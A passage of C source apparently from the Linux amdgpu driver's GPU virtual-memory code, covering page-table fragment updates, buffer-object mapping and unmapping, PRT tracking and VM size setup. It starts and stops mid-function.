AMDGPU_GPU_PAGE_SIZE, flags); params->func(params, pt, pe_start, dst, nptes, AMDGPU_GPU_PAGE_SIZE, flags); } return 0; } /* * amdgpu_vm_frag_ptes - add fragment information to PTEs * * @params: see amdgpu_pte_update_params definition * @vm: requested vm * @start: first PTE to handle * @end: last PTE to handle * @dst: addr those PTEs should point to * @flags: hw mapping flags * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_frag_ptes(struct amdgpu_pte_update_params *params, uint64_t start, uint64_t end, uint64_t dst, uint64_t flags) { /** * The MC L1 TLB supports variable sized pages, based on a fragment * field in the PTE. When this field is set to a non-zero value, page * granularity is increased from 4KB to (1 << (12 + frag)). The PTE * flags are considered valid for all PTEs within the fragment range * and corresponding mappings are assumed to be physically contiguous. * * The L1 TLB can store a single PTE for the whole fragment, * significantly increasing the space available for translation * caching. This leads to large improvements in throughput when the * TLB is under pressure. * * The L2 TLB distributes small and large fragments into two * asymmetric partitions. The large fragment cache is significantly * larger. Thus, we try to use large fragments wherever possible. * Userspace can support this by aligning virtual base address and * allocation size to the fragment size. */ unsigned max_frag = params->adev->vm_manager.fragment_size; int r; /* system pages are non continuously */ if (params->src || !(flags & AMDGPU_PTE_VALID)) return amdgpu_vm_update_ptes(params, start, end, dst, flags); while (start != end) { uint64_t frag_flags, frag_end; unsigned frag; /* This intentionally wraps around if no bit is set */ frag = min((unsigned)ffs(start) - 1, (unsigned)fls64(end - start) - 1); if (frag >= max_frag) { frag_flags = AMDGPU_PTE_FRAG(max_frag); frag_end = end & ~((1ULL << max_frag) - 1); } else { frag_flags = AMDGPU_PTE_FRAG(frag); frag_end = start + (1 << frag); } r = amdgpu_vm_update_ptes(params, start, frag_end, dst, flags | frag_flags); if (r) return r; dst += (frag_end - start) * AMDGPU_GPU_PAGE_SIZE; start = frag_end; } return 0; } /** * amdgpu_vm_bo_update_mapping - update a mapping in the vm page table * * @adev: amdgpu_device pointer * @exclusive: fence we need to sync to * @pages_addr: DMA addresses to use for mapping * @vm: requested vm * @start: start of mapped range * @last: last mapped entry * @flags: flags for the entries * @addr: addr to set the area to * @fence: optional resulting fence * * Fill in the page table entries between @start and @last. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_bo_update_mapping(struct amdgpu_device *adev, struct dma_fence *exclusive, dma_addr_t *pages_addr, struct amdgpu_vm *vm, uint64_t start, uint64_t last, uint64_t flags, uint64_t addr, struct dma_fence **fence) { struct amdgpu_ring *ring; void *owner = AMDGPU_FENCE_OWNER_VM; unsigned nptes, ncmds, ndw; struct amdgpu_job *job; struct amdgpu_pte_update_params params; struct dma_fence *f = NULL; int r; memset(&params, 0, sizeof(params)); params.adev = adev; params.vm = vm; /* sync to everything on unmapping */ if (!(flags & AMDGPU_PTE_VALID)) owner = AMDGPU_FENCE_OWNER_UNDEFINED; if (vm->use_cpu_for_update) { /* params.src is used as flag to indicate system Memory */ if (pages_addr) params.src = ~0; /* Wait for PT BOs to be free. PTs share the same resv. object * as the root PD BO */ r = amdgpu_vm_wait_pd(adev, vm, owner); if (unlikely(r)) return r; params.func = amdgpu_vm_cpu_set_ptes; params.pages_addr = pages_addr; return amdgpu_vm_frag_ptes(&params, start, last + 1, addr, flags); } ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); nptes = last - start + 1; /* * reserve space for two commands every (1 << BLOCK_SIZE) * entries or 2k dwords (whatever is smaller) * * The second command is for the shadow pagetables. */ if (vm->root.base.bo->shadow) ncmds = ((nptes >> min(adev->vm_manager.block_size, 11u)) + 1) * 2; else ncmds = ((nptes >> min(adev->vm_manager.block_size, 11u)) + 1); /* padding, etc. */ ndw = 64; if (pages_addr) { /* copy commands needed */ ndw += ncmds * adev->vm_manager.vm_pte_funcs->copy_pte_num_dw; /* and also PTEs */ ndw += nptes * 2; params.func = amdgpu_vm_do_copy_ptes; } else { /* set page commands needed */ ndw += ncmds * 10; /* extra commands for begin/end fragments */ ndw += 2 * 10 * adev->vm_manager.fragment_size; params.func = amdgpu_vm_do_set_ptes; } r = amdgpu_job_alloc_with_ib(adev, ndw * 4, &job); if (r) return r; params.ib = &job->ibs[0]; if (pages_addr) { uint64_t *pte; unsigned i; /* Put the PTEs at the end of the IB. */ i = ndw - nptes * 2; pte= (uint64_t *)&(job->ibs->ptr[i]); params.src = job->ibs->gpu_addr + i * 4; for (i = 0; i < nptes; ++i) { pte[i] = amdgpu_vm_map_gart(pages_addr, addr + i * AMDGPU_GPU_PAGE_SIZE); pte[i] |= flags; } addr = 0; } r = amdgpu_sync_fence(adev, &job->sync, exclusive, false); if (r) goto error_free; r = amdgpu_sync_resv(adev, &job->sync, vm->root.base.bo->tbo.resv, owner, false); if (r) goto error_free; r = reservation_object_reserve_shared(vm->root.base.bo->tbo.resv); if (r) goto error_free; r = amdgpu_vm_frag_ptes(&params, start, last + 1, addr, flags); if (r) goto error_free; amdgpu_ring_pad_ib(ring, params.ib); WARN_ON(params.ib->length_dw > ndw); r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_VM, &f); if (r) goto error_free; amdgpu_bo_fence(vm->root.base.bo, f, true); dma_fence_put(*fence); *fence = f; return 0; error_free: amdgpu_job_free(job); return r; } /** * amdgpu_vm_bo_split_mapping - split a mapping into smaller chunks * * @adev: amdgpu_device pointer * @exclusive: fence we need to sync to * @pages_addr: DMA addresses to use for mapping * @vm: requested vm * @mapping: mapped range and flags to use for the update * @flags: HW flags for the mapping * @nodes: array of drm_mm_nodes with the MC addresses * @fence: optional resulting fence * * Split the mapping into smaller chunks so that each update fits * into a SDMA IB. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_bo_split_mapping(struct amdgpu_device *adev, struct dma_fence *exclusive, dma_addr_t *pages_addr, struct amdgpu_vm *vm, struct amdgpu_bo_va_mapping *mapping, uint64_t flags, struct drm_mm_node *nodes, struct dma_fence **fence) { unsigned min_linear_pages = 1 << adev->vm_manager.fragment_size; uint64_t pfn, start = mapping->start; int r; /* normally,bo_va->flags only contians READABLE and WIRTEABLE bit go here * but in case of something, we filter the flags in first place */ if (!(mapping->flags & AMDGPU_PTE_READABLE)) flags &= ~AMDGPU_PTE_READABLE; if (!(mapping->flags & AMDGPU_PTE_WRITEABLE)) flags &= ~AMDGPU_PTE_WRITEABLE; flags &= ~AMDGPU_PTE_EXECUTABLE; flags |= mapping->flags & AMDGPU_PTE_EXECUTABLE; flags &= ~AMDGPU_PTE_MTYPE_MASK; flags |= (mapping->flags & AMDGPU_PTE_MTYPE_MASK); if ((mapping->flags & AMDGPU_PTE_PRT) && (adev->asic_type >= CHIP_VEGA10)) { flags |= AMDGPU_PTE_PRT; flags &= ~AMDGPU_PTE_VALID; } trace_amdgpu_vm_bo_update(mapping); pfn = mapping->offset >> PAGE_SHIFT; if (nodes) { while (pfn >= nodes->size) { pfn -= nodes->size; ++nodes; } } do { dma_addr_t *dma_addr = NULL; uint64_t max_entries; uint64_t addr, last; if (nodes) { addr = nodes->start << PAGE_SHIFT; max_entries = (nodes->size - pfn) * (PAGE_SIZE / AMDGPU_GPU_PAGE_SIZE); } else { addr = 0; max_entries = S64_MAX; } if (pages_addr) { uint64_t count; max_entries = min(max_entries, 16ull * 1024ull); for (count = 1; count < max_entries; ++count) { uint64_t idx = pfn + count; if (pages_addr[idx] != (pages_addr[idx - 1] + PAGE_SIZE)) break; } if (count < min_linear_pages) { addr = pfn << PAGE_SHIFT; dma_addr = pages_addr; } else { addr = pages_addr[pfn]; max_entries = count; } } else if (flags & AMDGPU_PTE_VALID) { addr += adev->vm_manager.vram_base_offset; addr += pfn << PAGE_SHIFT; } last = min((uint64_t)mapping->last, start + max_entries - 1); r = amdgpu_vm_bo_update_mapping(adev, exclusive, dma_addr, vm, start, last, flags, addr, fence); if (r) return r; pfn += last - start + 1; if (nodes && nodes->size == pfn) { pfn = 0; ++nodes; } start = last + 1; } while (unlikely(start != mapping->last + 1)); return 0; } /** * amdgpu_vm_bo_update - update all BO mappings in the vm page table * * @adev: amdgpu_device pointer * @bo_va: requested BO and VM object * @clear: if true clear the entries * * Fill in the page table entries for @bo_va. * Returns 0 for success, -EINVAL for failure. */ int amdgpu_vm_bo_update(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, bool clear) { struct amdgpu_bo *bo = bo_va->base.bo; struct amdgpu_vm *vm = bo_va->base.vm; struct amdgpu_bo_va_mapping *mapping; dma_addr_t *pages_addr = NULL; struct ttm_mem_reg *mem; struct drm_mm_node *nodes; struct dma_fence *exclusive, **last_update; uint64_t flags; int r; if (clear || !bo_va->base.bo) { mem = NULL; nodes = NULL; exclusive = NULL; } else { struct ttm_dma_tt *ttm; mem = &bo_va->base.bo->tbo.mem; nodes = mem->mm_node; if (mem->mem_type == TTM_PL_TT) { ttm = container_of(bo_va->base.bo->tbo.ttm, struct ttm_dma_tt, ttm); pages_addr = ttm->dma_address; } exclusive = reservation_object_get_excl(bo->tbo.resv); } if (bo) flags = amdgpu_ttm_tt_pte_flags(adev, bo->tbo.ttm, mem); else flags = 0x0; if (clear || (bo && bo->tbo.resv == vm->root.base.bo->tbo.resv)) last_update = &vm->last_update; else last_update = &bo_va->last_pt_update; if (!clear && bo_va->base.moved) { bo_va->base.moved = false; list_splice_init(&bo_va->valids, &bo_va->invalids); } else if (bo_va->cleared != clear) { list_splice_init(&bo_va->valids, &bo_va->invalids); } list_for_each_entry(mapping, &bo_va->invalids, list) { r = amdgpu_vm_bo_split_mapping(adev, exclusive, pages_addr, vm, mapping, flags, nodes, last_update); if (r) return r; } if (vm->use_cpu_for_update) { /* Flush HDP */ mb(); amdgpu_asic_flush_hdp(adev, NULL); } spin_lock(&vm->status_lock); list_del_init(&bo_va->base.vm_status); spin_unlock(&vm->status_lock); list_splice_init(&bo_va->invalids, &bo_va->valids); bo_va->cleared = clear; if (trace_amdgpu_vm_bo_mapping_enabled()) { list_for_each_entry(mapping, &bo_va->valids, list) trace_amdgpu_vm_bo_mapping(mapping); } return 0; } /** * amdgpu_vm_update_prt_state - update the global PRT state */ static void amdgpu_vm_update_prt_state(struct amdgpu_device *adev) { unsigned long flags; bool enable; spin_lock_irqsave(&adev->vm_manager.prt_lock, flags); enable = !!atomic_read(&adev->vm_manager.num_prt_users); adev->gmc.gmc_funcs->set_prt(adev, enable); spin_unlock_irqrestore(&adev->vm_manager.prt_lock, flags); } /** * amdgpu_vm_prt_get - add a PRT user */ static void amdgpu_vm_prt_get(struct amdgpu_device *adev) { if (!adev->gmc.gmc_funcs->set_prt) return; if (atomic_inc_return(&adev->vm_manager.num_prt_users) == 1) amdgpu_vm_update_prt_state(adev); } /** * amdgpu_vm_prt_put - drop a PRT user */ static void amdgpu_vm_prt_put(struct amdgpu_device *adev) { if (atomic_dec_return(&adev->vm_manager.num_prt_users) == 0) amdgpu_vm_update_prt_state(adev); } /** * amdgpu_vm_prt_cb - callback for updating the PRT status */ static void amdgpu_vm_prt_cb(struct dma_fence *fence, struct dma_fence_cb *_cb) { struct amdgpu_prt_cb *cb = container_of(_cb, struct amdgpu_prt_cb, cb); amdgpu_vm_prt_put(cb->adev); kfree(cb); } /** * amdgpu_vm_add_prt_cb - add callback for updating the PRT status */ static void amdgpu_vm_add_prt_cb(struct amdgpu_device *adev, struct dma_fence *fence) { struct amdgpu_prt_cb *cb; if (!adev->gmc.gmc_funcs->set_prt) return; cb = kmalloc(sizeof(struct amdgpu_prt_cb), GFP_KERNEL); if (!cb) { /* Last resort when we are OOM */ if (fence) dma_fence_wait(fence, false); amdgpu_vm_prt_put(adev); } else { cb->adev = adev; if (!fence || dma_fence_add_callback(fence, &cb->cb, amdgpu_vm_prt_cb)) amdgpu_vm_prt_cb(fence, &cb->cb); } } /** * amdgpu_vm_free_mapping - free a mapping * * @adev: amdgpu_device pointer * @vm: requested vm * @mapping: mapping to be freed * @fence: fence of the unmap operation * * Free a mapping and make sure we decrease the PRT usage count if applicable. */ static void amdgpu_vm_free_mapping(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo_va_mapping *mapping, struct dma_fence *fence) { if (mapping->flags & AMDGPU_PTE_PRT) amdgpu_vm_add_prt_cb(adev, fence); kfree(mapping); } /** * amdgpu_vm_prt_fini - finish all prt mappings * * @adev: amdgpu_device pointer * @vm: requested vm * * Register a cleanup callback to disable PRT support after VM dies. */ static void amdgpu_vm_prt_fini(struct amdgpu_device *adev, struct amdgpu_vm *vm) { struct reservation_object *resv = vm->root.base.bo->tbo.resv; struct dma_fence *excl, **shared; unsigned i, shared_count; int r; r = reservation_object_get_fences_rcu(resv, &excl, &shared_count, &shared); if (r) { /* Not enough memory to grab the fence list, as last resort * block for all the fences to complete. */ reservation_object_wait_timeout_rcu(resv, true, false, MAX_SCHEDULE_TIMEOUT); return; } /* Add a callback for each fence in the reservation object */ amdgpu_vm_prt_get(adev); amdgpu_vm_add_prt_cb(adev, excl); for (i = 0; i < shared_count; ++i) { amdgpu_vm_prt_get(adev); amdgpu_vm_add_prt_cb(adev, shared[i]); } kfree(shared); } /** * amdgpu_vm_clear_freed - clear freed BOs in the PT * * @adev: amdgpu_device pointer * @vm: requested vm * @fence: optional resulting fence (unchanged if no work needed to be done * or if an error occurred) * * Make sure all freed BOs are cleared in the PT. * Returns 0 for success. * * PTs have to be reserved and mutex must be locked! */ int amdgpu_vm_clear_freed(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct dma_fence **fence) { struct amdgpu_bo_va_mapping *mapping; uint64_t init_pte_value = 0; struct dma_fence *f = NULL; int r; while (!list_empty(&vm->freed)) { mapping = list_first_entry(&vm->freed, struct amdgpu_bo_va_mapping, list); list_del(&mapping->list); if (vm->pte_support_ats && mapping->start < AMDGPU_VA_HOLE_START) init_pte_value = AMDGPU_PTE_DEFAULT_ATC; r = amdgpu_vm_bo_update_mapping(adev, NULL, NULL, vm, mapping->start, mapping->last, init_pte_value, 0, &f); amdgpu_vm_free_mapping(adev, vm, mapping, f); if (r) { dma_fence_put(f); return r; } } if (fence && f) { dma_fence_put(*fence); *fence = f; } else { dma_fence_put(f); } return 0; } /** * amdgpu_vm_handle_moved - handle moved BOs in the PT * * @adev: amdgpu_device pointer * @vm: requested vm * @sync: sync object to add fences to * * Make sure all BOs which are moved are updated in the PTs. * Returns 0 for success. * * PTs have to be reserved! */ int amdgpu_vm_handle_moved(struct amdgpu_device *adev, struct amdgpu_vm *vm) { bool clear; int r = 0; spin_lock(&vm->status_lock); while (!list_empty(&vm->moved)) { struct amdgpu_bo_va *bo_va; struct reservation_object *resv; bo_va = list_first_entry(&vm->moved, struct amdgpu_bo_va, base.vm_status); spin_unlock(&vm->status_lock); resv = bo_va->base.bo->tbo.resv; /* Per VM BOs never need to bo cleared in the page tables */ if (resv == vm->root.base.bo->tbo.resv) clear = false; /* Try to reserve the BO to avoid clearing its ptes */ else if (!amdgpu_vm_debug && reservation_object_trylock(resv)) clear = false; /* Somebody else is using the BO right now */ else clear = true; r = amdgpu_vm_bo_update(adev, bo_va, clear); if (r) return r; if (!clear && resv != vm->root.base.bo->tbo.resv) reservation_object_unlock(resv); spin_lock(&vm->status_lock); } spin_unlock(&vm->status_lock); return r; } /** * amdgpu_vm_bo_add - add a bo to a specific vm * * @adev: amdgpu_device pointer * @vm: requested vm * @bo: amdgpu buffer object * * Add @bo into the requested vm. * Add @bo to the list of bos associated with the vm * Returns newly added bo_va or NULL for failure * * Object has to be reserved! */ struct amdgpu_bo_va *amdgpu_vm_bo_add(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo *bo) { struct amdgpu_bo_va *bo_va; bo_va = kzalloc(sizeof(struct amdgpu_bo_va), GFP_KERNEL); if (bo_va == NULL) { return NULL; } bo_va->base.vm = vm; bo_va->base.bo = bo; INIT_LIST_HEAD(&bo_va->base.bo_list); INIT_LIST_HEAD(&bo_va->base.vm_status); bo_va->ref_count = 1; INIT_LIST_HEAD(&bo_va->valids); INIT_LIST_HEAD(&bo_va->invalids); if (!bo) return bo_va; list_add_tail(&bo_va->base.bo_list, &bo->va); if (bo->tbo.resv != vm->root.base.bo->tbo.resv) return bo_va; if (bo->preferred_domains & amdgpu_mem_type_to_domain(bo->tbo.mem.mem_type)) return bo_va; /* * We checked all the prerequisites, but it looks like this per VM BO * is currently evicted. add the BO to the evicted list to make sure it * is validated on next VM use to avoid fault. * */ spin_lock(&vm->status_lock); list_move_tail(&bo_va->base.vm_status, &vm->evicted); spin_unlock(&vm->status_lock); return bo_va; } /** * amdgpu_vm_bo_insert_mapping - insert a new mapping * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @mapping: the mapping to insert * * Insert a new mapping into all structures. */ static void amdgpu_vm_bo_insert_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, struct amdgpu_bo_va_mapping *mapping) { struct amdgpu_vm *vm = bo_va->base.vm; struct amdgpu_bo *bo = bo_va->base.bo; mapping->bo_va = bo_va; list_add(&mapping->list, &bo_va->invalids); amdgpu_vm_it_insert(mapping, &vm->va); if (mapping->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); if (bo && bo->tbo.resv == vm->root.base.bo->tbo.resv) { spin_lock(&vm->status_lock); if (list_empty(&bo_va->base.vm_status)) list_add(&bo_va->base.vm_status, &vm->moved); spin_unlock(&vm->status_lock); } trace_amdgpu_vm_bo_map(bo_va, mapping); } /** * amdgpu_vm_bo_map - map bo inside a vm * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @saddr: where to map the BO * @offset: requested offset in the BO * @flags: attributes of pages (read/write/valid/etc.) * * Add a mapping of the BO at the specefied addr into the VM. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside! */ int amdgpu_vm_bo_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr, uint64_t offset, uint64_t size, uint64_t flags) { struct amdgpu_bo_va_mapping *mapping, *tmp; struct amdgpu_bo *bo = bo_va->base.bo; struct amdgpu_vm *vm = bo_va->base.vm; uint64_t eaddr; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || offset & AMDGPU_GPU_PAGE_MASK || size == 0 || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; /* make sure object fit at this offset */ eaddr = saddr + size - 1; if (saddr >= eaddr || (bo && offset + size > amdgpu_bo_size(bo))) return -EINVAL; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr); if (tmp) { /* bo and tmp overlap, invalid addr */ dev_err(adev->dev, "bo %p va 0x%010Lx-0x%010Lx conflict with " "0x%010Lx-0x%010Lx\n", bo, saddr, eaddr, tmp->start, tmp->last + 1); return -EINVAL; } mapping = kmalloc(sizeof(*mapping), GFP_KERNEL); if (!mapping) return -ENOMEM; mapping->start = saddr; mapping->last = eaddr; mapping->offset = offset; mapping->flags = flags; amdgpu_vm_bo_insert_map(adev, bo_va, mapping); return 0; } /** * amdgpu_vm_bo_replace_map - map bo inside a vm, replacing existing mappings * * @adev: amdgpu_device pointer * @bo_va: bo_va to store the address * @saddr: where to map the BO * @offset: requested offset in the BO * @flags: attributes of pages (read/write/valid/etc.) * * Add a mapping of the BO at the specefied addr into the VM. Replace existing * mappings as we do so. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside! */ int amdgpu_vm_bo_replace_map(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr, uint64_t offset, uint64_t size, uint64_t flags) { struct amdgpu_bo_va_mapping *mapping; struct amdgpu_bo *bo = bo_va->base.bo; uint64_t eaddr; int r; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || offset & AMDGPU_GPU_PAGE_MASK || size == 0 || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; /* make sure object fit at this offset */ eaddr = saddr + size - 1; if (saddr >= eaddr || (bo && offset + size > amdgpu_bo_size(bo))) return -EINVAL; /* Allocate all the needed memory */ mapping = kmalloc(sizeof(*mapping), GFP_KERNEL); if (!mapping) return -ENOMEM; r = amdgpu_vm_bo_clear_mappings(adev, bo_va->base.vm, saddr, size); if (r) { kfree(mapping); return r; } saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; mapping->start = saddr; mapping->last = eaddr; mapping->offset = offset; mapping->flags = flags; amdgpu_vm_bo_insert_map(adev, bo_va, mapping); return 0; } /** * amdgpu_vm_bo_unmap - remove bo mapping from vm * * @adev: amdgpu_device pointer * @bo_va: bo_va to remove the address from * @saddr: where to the BO is mapped * * Remove a mapping of the BO at the specefied addr from the VM. * Returns 0 for success, error for failure. * * Object has to be reserved and unreserved outside! */ int amdgpu_vm_bo_unmap(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va, uint64_t saddr) { struct amdgpu_bo_va_mapping *mapping; struct amdgpu_vm *vm = bo_va->base.vm; bool valid = true; saddr /= AMDGPU_GPU_PAGE_SIZE; list_for_each_entry(mapping, &bo_va->valids, list) { if (mapping->start == saddr) break; } if (&mapping->list == &bo_va->valids) { valid = false; list_for_each_entry(mapping, &bo_va->invalids, list) { if (mapping->start == saddr) break; } if (&mapping->list == &bo_va->invalids) return -ENOENT; } list_del(&mapping->list); amdgpu_vm_it_remove(mapping, &vm->va); mapping->bo_va = NULL; trace_amdgpu_vm_bo_unmap(bo_va, mapping); if (valid) list_add(&mapping->list, &vm->freed); else amdgpu_vm_free_mapping(adev, vm, mapping, bo_va->last_pt_update); return 0; } /** * amdgpu_vm_bo_clear_mappings - remove all mappings in a specific range * * @adev: amdgpu_device pointer * @vm: VM structure to use * @saddr: start of the range * @size: size of the range * * Remove all mappings in a range, split them as appropriate. * Returns 0 for success, error for failure. */ int amdgpu_vm_bo_clear_mappings(struct amdgpu_device *adev, struct amdgpu_vm *vm, uint64_t saddr, uint64_t size) { struct amdgpu_bo_va_mapping *before, *after, *tmp, *next; LIST_HEAD(removed); uint64_t eaddr; eaddr = saddr + size - 1; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; /* Allocate all the needed memory */ before = kzalloc(sizeof(*before), GFP_KERNEL); if (!before) return -ENOMEM; INIT_LIST_HEAD(&before->list); after = kzalloc(sizeof(*after), GFP_KERNEL); if (!after) { kfree(before); return -ENOMEM; } INIT_LIST_HEAD(&after->list); /* Now gather all removed mappings */ tmp = amdgpu_vm_it_iter_first(&vm->va, saddr, eaddr); while (tmp) { /* Remember mapping split at the start */ if (tmp->start < saddr) { before->start = tmp->start; before->last = saddr - 1; before->offset = tmp->offset; before->flags = tmp->flags; list_add(&before->list, &tmp->list); } /* Remember mapping split at the end */ if (tmp->last > eaddr) { after->start = eaddr + 1; after->last = tmp->last; after->offset = tmp->offset; after->offset += after->start - tmp->start; after->flags = tmp->flags; list_add(&after->list, &tmp->list); } list_del(&tmp->list); list_add(&tmp->list, &removed); tmp = amdgpu_vm_it_iter_next(tmp, saddr, eaddr); } /* And free them up */ list_for_each_entry_safe(tmp, next, &removed, list) { amdgpu_vm_it_remove(tmp, &vm->va); list_del(&tmp->list); if (tmp->start < saddr) tmp->start = saddr; if (tmp->last > eaddr) tmp->last = eaddr; tmp->bo_va = NULL; list_add(&tmp->list, &vm->freed); trace_amdgpu_vm_bo_unmap(NULL, tmp); } /* Insert partial mapping before the range */ if (!list_empty(&before->list)) { amdgpu_vm_it_insert(before, &vm->va); if (before->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); } else { kfree(before); } /* Insert partial mapping after the range */ if (!list_empty(&after->list)) { amdgpu_vm_it_insert(after, &vm->va); if (after->flags & AMDGPU_PTE_PRT) amdgpu_vm_prt_get(adev); } else { kfree(after); } return 0; } /** * amdgpu_vm_bo_lookup_mapping - find mapping by address * * @vm: the requested VM * * Find a mapping by it's address. */ struct amdgpu_bo_va_mapping *amdgpu_vm_bo_lookup_mapping(struct amdgpu_vm *vm, uint64_t addr) { return amdgpu_vm_it_iter_first(&vm->va, addr, addr); } /** * amdgpu_vm_bo_rmv - remove a bo to a specific vm * * @adev: amdgpu_device pointer * @bo_va: requested bo_va * * Remove @bo_va->bo from the requested vm. * * Object have to be reserved! */ void amdgpu_vm_bo_rmv(struct amdgpu_device *adev, struct amdgpu_bo_va *bo_va) { struct amdgpu_bo_va_mapping *mapping, *next; struct amdgpu_vm *vm = bo_va->base.vm; list_del(&bo_va->base.bo_list); spin_lock(&vm->status_lock); list_del(&bo_va->base.vm_status); spin_unlock(&vm->status_lock); list_for_each_entry_safe(mapping, next, &bo_va->valids, list) { list_del(&mapping->list); amdgpu_vm_it_remove(mapping, &vm->va); mapping->bo_va = NULL; trace_amdgpu_vm_bo_unmap(bo_va, mapping); list_add(&mapping->list, &vm->freed); } list_for_each_entry_safe(mapping, next, &bo_va->invalids, list) { list_del(&mapping->list); amdgpu_vm_it_remove(mapping, &vm->va); amdgpu_vm_free_mapping(adev, vm, mapping, bo_va->last_pt_update); } dma_fence_put(bo_va->last_pt_update); kfree(bo_va); } /** * amdgpu_vm_bo_invalidate - mark the bo as invalid * * @adev: amdgpu_device pointer * @vm: requested vm * @bo: amdgpu buffer object * * Mark @bo as invalid. */ void amdgpu_vm_bo_invalidate(struct amdgpu_device *adev, struct amdgpu_bo *bo, bool evicted) { struct amdgpu_vm_bo_base *bo_base; list_for_each_entry(bo_base, &bo->va, bo_list) { struct amdgpu_vm *vm = bo_base->vm; bo_base->moved = true; if (evicted && bo->tbo.resv == vm->root.base.bo->tbo.resv) { spin_lock(&bo_base->vm->status_lock); if (bo->tbo.type == ttm_bo_type_kernel) list_move(&bo_base->vm_status, &vm->evicted); else list_move_tail(&bo_base->vm_status, &vm->evicted); spin_unlock(&bo_base->vm->status_lock); continue; } if (bo->tbo.type == ttm_bo_type_kernel) { spin_lock(&bo_base->vm->status_lock); if (list_empty(&bo_base->vm_status)) list_add(&bo_base->vm_status, &vm->relocated); spin_unlock(&bo_base->vm->status_lock); continue; } spin_lock(&bo_base->vm->status_lock); if (list_empty(&bo_base->vm_status)) list_add(&bo_base->vm_status, &vm->moved); spin_unlock(&bo_base->vm->status_lock); } } static uint32_t amdgpu_vm_get_block_size(uint64_t vm_size) { /* Total bits covered by PD + PTs */ unsigned bits = ilog2(vm_size) + 18; /* Make sure the PD is 4K in size up to 8GB address space. Above that split equal between PD and PTs */ if (vm_size <= 8) return (bits - 9); else return ((bits + 3) / 2); } /** * amdgpu_vm_adjust_size - adjust vm size, block size and fragment size * * @adev: amdgpu_device pointer * @vm_size: the default vm size if it's set auto */ void amdgpu_vm_adjust_size(struct amdgpu_device *adev, uint32_t vm_size, uint32_t fragment_size_default, unsigned max_level, unsigned max_bits) { uint64_t tmp; /* adjust vm size first */ if (amdgpu_vm_size != -1) { unsigned max_size = 1 << (max_bits - 30); vm_size = amdgpu_vm_size; if (vm_size > max_size) { dev_warn(adev->dev, "VM size (%d) too large, max is %u GB\n", amdgpu_vm_size, max_size); vm_size = max_size; } } adev->vm_manager.max_pfn = (uint64_t)vm_size << 18; tmp = roundup_pow_of_two(adev->vm_manager.max_pfn); if (amdgpu_vm_block_size != -1) tmp >>= amdgpu_vm_block_size - 9; tmp = DIV_ROUND_UP(fls64(tmp) - 1, 9) - 1; adev->vm_manager.num_level = min(max_level, (unsigned)tmp); switch (adev->vm_manager.num_level) { case 3: adev->vm_manager.root_level = AMDGPU_VM_PDB2; break; case 2: adev->vm_manager.root_level = AMDGPU_VM_PDB1; break; case 1: adev->vm_manager.root_level = AMDGPU_VM_PDB0; break; default: dev_err(adev->dev, "VMPT only supports 2~4+1 levels\n"); } /* block size depends on vm size and hw setup*/ if (amdgpu_vm_block_size != -1) adev->vm_manager.block_size = min((unsigned)amdgpu_vm_block_size, max_bits - AMDGPU_GPU_PAGE_SHIFT - 9 * adev->vm_manager.num_level); else if (adev->vm_manager.num_level > 1) adev->vm_manager.block_size = 9; else adev->vm_manager.block_size = amdgpu_vm_get_block_size(tmp); if (amdgpu_vm_fragment_size == -1) adev->vm_manager.fragment_size = fragment_size_default; else adev->vm_manager.fragment_size = amdgpu_vm_fragment_size; DRM_INFO("vm size is %u GB, %u levels, block size is %u-bit, fragment size is %u-bit\n", vm_size, adev->vm_manager.num_level + 1, adev->vm_manager.block_size, adev->vm_manager.fragment_size); } /** * amdgpu_vm_init - initialize a vm instance * * @adev: amdgpu_device pointer * @vm: requested vm * @vm_context: Indicates if it GFX or Compute context * * Init @vm fields. */ int amdgpu_vm_init(struct amdgpu_device *adev, struct amdgpu_vm *vm, int vm_context, unsigned int pasid) { const unsigned align = min(AMDGPU_VM_PTB_ALIGN_SIZE, AMDGPU_VM_PTE_COUNT(adev) * 8); unsigned ring_instance; struct amdgpu_ring *ring; struct drm_sched_rq *rq; unsigned long size; uint64_t flags; int r, i; vm->va = RB_ROOT_CACHED; for (i = 0; i < AMDGPU_MAX_VMHUBS; i++) vm->reserved_vmid[i] = NULL; spin_lock_init(&vm->status_lock); INIT_LIST_HEAD(&vm->evicted); INIT_LIST_HEAD(&vm->relocated); INIT_LIST_HEAD(&vm->moved); INIT_LIST_HEAD(&vm->freed); /* create scheduler entity for page table updates */ ring_instance = atomic_inc_return(&adev->vm_manager.vm_pte_next_ring); ring_instance %= adev->vm_manager.vm_pte_num_rings; ring = adev->vm_manager.vm_pte_rings[ring_instance]; rq = &ring->sched.sched_rq[DRM_SCHED_PRIORITY_KERNEL]; r = drm_sched_entity_init(&ring->sched, &vm->entity, rq, amdgpu_sched_jobs, NULL); if (r) return r; vm->pte_support_ats = false; if (vm_context == AMDGPU_VM_CONTEXT_COMPUTE) { vm->use_cpu_for_update = 